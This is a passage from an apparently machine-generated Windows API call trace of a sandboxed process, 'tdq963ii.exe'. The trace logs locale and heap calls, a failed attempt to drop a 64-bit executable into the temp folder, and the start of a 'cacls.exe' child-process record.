(hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0174.918] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0174.918] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0174.918] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0174.918] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0174.918] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0174.918] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0174.919] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0174.919] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0174.919] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0174.919] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0174.919] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0174.919] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0174.919] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0174.919] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0174.939] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x3bc) returned 0x656090 [0174.939] GetCurrentThreadId () returned 0xae8 [0174.939] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x18) returned 0x656458 [0174.939] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x800) returned 0x656478 [0174.939] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"blank.jtp\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0xf70ec22e, hStdError=0x0)) [0174.939] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0174.940] GetFileType (hFile=0x3) returned 0x2 [0174.940] GetStdHandle (nStdHandle=0xfffffff5) returned 0x80 [0174.940] GetFileType (hFile=0x80) returned 0x3 [0174.940] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0174.940] GetFileType (hFile=0xb) returned 0x2 [0174.941] GetCommandLineW () returned="tdq963ii.exe -accepteula \"blank.jtp\" -nobanner" [0174.941] GetEnvironmentStringsW () returned 0x656c80* [0174.941] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0xb7a) returned 0x657808 [0174.945] FreeEnvironmentStringsW (penv=0x656c80) returned 1 [0174.945] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0174.945] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x6e) returned 0x656c80 [0174.949] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0xa0) returned 0x656cf8 [0174.949] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x3e) returned 0x6583a8 [0175.760] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x6c) returned 0x656da0 [0175.760] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x6e) returned 0x656e18 [0175.760] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x78) returned 0x64f8b8 [0175.760] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x62) returned 0x656e90 [0175.760] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x2e) returned 0x656f00 [0175.760] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x48) returned 0x656f38 [0175.760] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x1e) returned 0x655a60 [0175.760] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x28) returned 0x656f88 [0175.760] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x1a) returned 0x655a88 [0175.760] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x4a) returned 0x656fb8 [0175.760] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x72) returned 0x64f938 [0175.761] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x30) returned 0x657010 [0175.761] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x2e) returned 0x657048 [0175.761] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x1c) returned 0x655ab0 [0175.761] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0xd2) returned 0x657080 [0175.761] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x7c) returned 0x657160 [0175.761] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x36) returned 0x6571e8 [0175.761] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x3a) returned 0x6583f0 [0175.761] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x90) returned 0x657228 [0175.761] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x24) returned 0x6572c0 [0175.761] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x30) returned 0x6572f0 [0175.761] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x36) returned 0x657328 [0175.761] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x48) returned 0x657368 [0175.761] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x52) returned 0x6573b8 [0175.761] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x3c) returned 0x658438 [0175.761] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x18) returned 0x657418 [0175.761] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x82) returned 0x657438 [0175.761] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x2e) returned 0x6574c8 [0175.761] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x1e) returned 0x655ad8 [0175.761] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x2c) returned 0x657500 [0175.761] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x54) returned 0x657538 [0175.761] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x52) returned 0x657598 [0175.761] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x2a) returned 0x6575f8 [0175.762] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x3c) returned 0x658480 [0175.762] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x54) returned 0x657630 [0175.762] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x24) returned 0x657690 [0175.762] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x30) returned 0x6576c0 [0175.762] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x8c) returned 0x6576f8 [0175.762] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x657808 | out: hHeap=0x640000) returned 1 [0176.829] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x800) returned 0x657790 [0176.829] GetLastError () returned 0x0 [0176.830] SetLastError (dwErrCode=0x0) [0176.830] GetLastError () returned 0x0 [0176.830] SetLastError (dwErrCode=0x0) [0176.830] GetLastError () returned 0x0 [0176.830] SetLastError (dwErrCode=0x0) [0176.830] GetACP () returned 0x4e4 [0176.830] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x220) returned 0x657f98 [0176.830] GetLastError () returned 0x0 [0176.830] SetLastError (dwErrCode=0x0) [0176.830] IsValidCodePage (CodePage=0x4e4) returned 1 [0176.830] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0176.830] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0176.832] GetLastError () returned 0x0 [0176.832] SetLastError (dwErrCode=0x0) [0176.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0176.835] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0176.835] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0176.835] GetLastError () returned 0x0 [0176.835] SetLastError (dwErrCode=0x0) [0176.835] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0176.835] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0176.835] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0176.835] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0176.835] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¾Ã\x0e÷äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0176.835] GetLastError () returned 0x0 [0176.835] SetLastError (dwErrCode=0x0) [0176.835] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0176.835] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0176.835] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0176.835] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0176.835] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¾Ã\x0e÷äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0176.836] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x80) returned 0x6581c0 [0176.850] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0176.850] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0176.850] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x6581c0) returned 0x80 [0176.851] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0176.851] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0176.851] GetCurrentProcess () returned 0xffffffff [0176.851] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0176.851] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0176.851] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0176.854] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0176.854] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0176.854] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0176.854] LockResource (hResData=0x43c648) returned 0x43c648 [0176.854] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x18) returned 0x658248 [0176.855] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.215] GetLastError () returned 0x20 [0178.215] GetLastError () returned 0x20 [0178.215] SetLastError (dwErrCode=0x20) [0178.215] GetLastError () returned 0x20 [0178.216] SetLastError (dwErrCode=0x20) [0178.216] GetLastError () returned 0x20 [0178.216] SetLastError (dwErrCode=0x20) [0178.216] GetLastError () returned 0x20 [0178.217] SetLastError (dwErrCode=0x20) [0178.217] GetLastError () returned 0x20 [0178.217] SetLastError (dwErrCode=0x20) [0178.217] GetLastError () returned 0x20 [0178.217] SetLastError (dwErrCode=0x20) [0178.217] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x1000) returned 0x6597d8 [0178.219] WriteFile (in: hFile=0x80, lpBuffer=0x18ea08*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e334, lpOverlapped=0x0 | out: lpBuffer=0x18ea08*, lpNumberOfBytesWritten=0x18e334*=0x49, lpOverlapped=0x0) returned 1 [0178.221] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x657790 | out: hHeap=0x640000) returned 1 [0178.222] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0178.222] ExitProcess (uExitCode=0x1) [0178.222] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x656090 | out: hHeap=0x640000) returned 1 Process: id = "167" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x31ec7000" os_pid = "0x6a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "150" os_parent_pid = "0x598" 